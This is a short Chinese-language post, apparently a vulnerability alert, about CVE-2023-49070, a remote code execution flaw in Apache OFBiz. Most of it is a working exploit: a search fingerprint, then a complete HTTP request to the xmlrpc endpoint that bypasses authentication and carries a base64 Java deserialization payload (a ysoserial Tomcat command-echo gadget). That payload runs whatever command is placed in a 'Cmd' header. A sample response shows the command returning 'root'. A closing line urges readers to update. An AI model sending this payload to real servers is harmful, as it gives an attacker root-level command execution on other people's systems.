叮～你有新的速递！CVE-2023-49070 远程代码执行漏洞（附EXP）

Apache OFBiz < 18.12.10

icon_hash="196478136"

POST /webtools/control/xmlrpc;/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/2Host: 127.0.0.1Content-Type: application/xmlContent-Length: 8909Cmd: whoami
<?xml version="1.0"?><methodCall>  <methodName>ProjectDiscovery</methodName>  <params>    <param>      <value>        <struct>          <member>            <name>test</name>            <value>              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b3LjoYjqcyKkSAIAAkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAASTGphdmEvbGFuZy9TdHJpbmc7eHBzcgAqamF2YS5sYW5nLlN0cmluZyRDYXNlSW5zZW5zaXRpdmVDb21wYXJhdG9ydwNcfVxQ5c4CAAB4cHQAEG91dHB1dFByb3BlcnRpZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1lcQB+AARMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAACdXIAAltCrPMX+AYIVOACAAB4cAAAFLHK/rq+AAAAMwEFCgBFAIkKAIoAiwoAigCMCgAdAI0IAHoKABsAjgoAjwCQCgCPAJEHAHsKAIoAkggAkwoAIACUCACVCACWBwCXCACYCABYBwCZCgAbAJoIAJsIAHAHAJwLABYAnQsAFgCeCABnCACfBwCgCgAbAKEHAKIKAKMApAgApQcApggApwoAIACoCACpCQAlAKoHAKsKACUArAgArQoArgCvCgAgALAIALEIALIIALMIALQIALUHALYHALcKADAAuAoAMAC5CgC6ALsKAC8AvAgAvQoALwC+CgAvAL8KACAAwAgAwQoAGwDCCgAbAMMIAMQHAGQKABsAxQgAxgcAxwgAyAgAyQcAygcBAwcAzAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAsTHlzb3NlcmlhbC9wYXlsb2Fkcy90ZW1wbGF0ZXMvVG9tY2F0Q21kRWNobzsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAzQEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAIPGNsaW5pdD4BAAFlAQAgTGphdmEvbGFuZy9Ob1N1Y2hGaWVsZEV4Y2VwdGlvbjsBAANjbHMBABFMamF2YS9sYW5nL0NsYXNzOwEABHZhcjUBACFMamF2YS9sYW5nL05vU3VjaE1ldGhvZEV4Y2VwdGlvbjsBAARjbWRzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEABnJlc3VsdAEAAltCAQAJcHJvY2Vzc29yAQASTGphdmEvbGFuZy9PYmplY3Q7AQADcmVxAQAEcmVzcAEAAWoBAAFJAQABdAEAEkxqYXZhL2xhbmcvVGhyZWFkOwEAA3N0cgEAEkxqYXZhL2xhbmcvU3RyaW5nOwEAA29iagEACnByb2Nlc3NvcnMBABBMamF2YS91dGlsL0xpc3Q7AQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQABaQEABGZsYWcBAAFaAQAFZ3JvdXABABdMamF2YS9sYW5nL1RocmVhZEdyb3VwOwEAAWYBABlMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAHdGhyZWFkcwEAE1tMamF2YS9sYW5nL1RocmVhZDsBAA1TdGFja01hcFRhYmxlBwDOBwDPBwDQBwCmBwCiBwCZBwCcBwBiBwDHBwDKAQAKU291cmNlRmlsZQEAElRvbWNhdENtZEVjaG8uamF2YQwARgBHBwDQDADRANIMANMA1AwA1QDWDADXANgHAM8MANkA2gwA2wDcDADdAN4BAARleGVjDADfAOABAARodHRwAQAGdGFyZ2V0AQASamF2YS9sYW5nL1J1bm5hYmxlAQAGdGhpcyQwAQAeamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uDADhANYBAAZnbG9iYWwBAA5qYXZhL3V0aWwvTGlzdAwA4gDjDADbAOQBAAtnZXRSZXNwb25zZQEAD2phdmEvbGFuZy9DbGFzcwwA5QDmAQAQamF2YS9sYW5nL09iamVjdAcA5wwA6ADpAQAJZ2V0SGVhZGVyAQAQamF2YS9sYW5nL1N0cmluZwEAA2NtZAwA6gDrAQAJc2V0U3RhdHVzDADsAF4BABFqYXZhL2xhbmcvSW50ZWdlcgwARgDtAQAHb3MubmFtZQcA7gwA7wDwDADxAN4BAAN3aW4BAAdjbWQuZXhlAQACL2MBAAkvYmluL2Jhc2gBAAItYwEAEWphdmEvdXRpbC9TY2FubmVyAQAYamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyDABGAPIMAPMA9AcA9QwA9gD3DABGAPgBAAJcQQwA+QD6DAD7AN4MAPwA/QEAJG9yZy5hcGFjaGUudG9tY2F0LnV0aWwuYnVmLkJ5dGVDaHVuawwA/gD/DAEAAQEBAAhzZXRCeXRlcwwBAgDmAQAHZG9Xcml0ZQEAH2phdmEvbGFuZy9Ob1N1Y2hNZXRob2RFeGNlcHRpb24BABNqYXZhLm5pby5CeXRlQnVmZmVyAQAEd3JhcAEAE2phdmEvbGFuZy9FeGNlcHRpb24BACp5c29zZXJpYWwvcGF5bG9hZHMvdGVtcGxhdGVzL1RvbWNhdENtZEVjaG8BAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAVamF2YS9sYW5nL1RocmVhZEdyb3VwAQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBABBqYXZhL2xhbmcvVGhyZWFkAQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7AQAOZ2V0VGhyZWFkR3JvdXABABkoKUxqYXZhL2xhbmcvVGhyZWFkR3JvdXA7AQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7AQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEADXNldEFjY2Vzc2libGUBAAQoWilWAQADZ2V0AQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAdnZXROYW1lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAhjb250YWlucwEAGyhMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspWgEADWdldFN1cGVyY2xhc3MBAARzaXplAQADKClJAQAVKEkpTGphdmEvbGFuZy9PYmplY3Q7AQAJZ2V0TWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAEABmludm9rZQEAOShMamF2YS9sYW5nL09iamVjdDtbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAB2lzRW1wdHkBAAMoKVoBAARUWVBFAQAEKEkpVgEAEGphdmEvbGFuZy9TeXN0ZW0BAAtnZXRQcm9wZXJ0eQEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9T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</serializable>            </value>          </member>        </struct>      </value>    </param>  </params></methodCall>

HTTP/2 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 14 Dec 2023 02:11:56 GMTContent-Type: text/html;charset=UTF-8Set-Cookie: JSESSIONID=6E077E5C20BCF1C43E57DB07CDD0E4E3.jvm1; Path=/webtools; HttpOnlySet-Cookie: OFBiz.Visitor=13078; Max-Age=31536000; Expires=Fri, 13-Dec-2024 02:11:56 GMT; Path=/; Secure; HttpOnlyVary: accept-encoding
root<?xml version="1.0" encoding="UTF-8"?><methodResponse xmlns:ex="http://ws.apache.org/xmlrpc/namespaces/extensions"><fault><value><struct><member><name>faultCode</name><value><i4>0</i4></value></member><member><name>faultString</name><value>Failed to read XML-RPC request. Please check logs for more information</value></member></struct></value></fault></methodResponse>

建议及时更新至最新版本！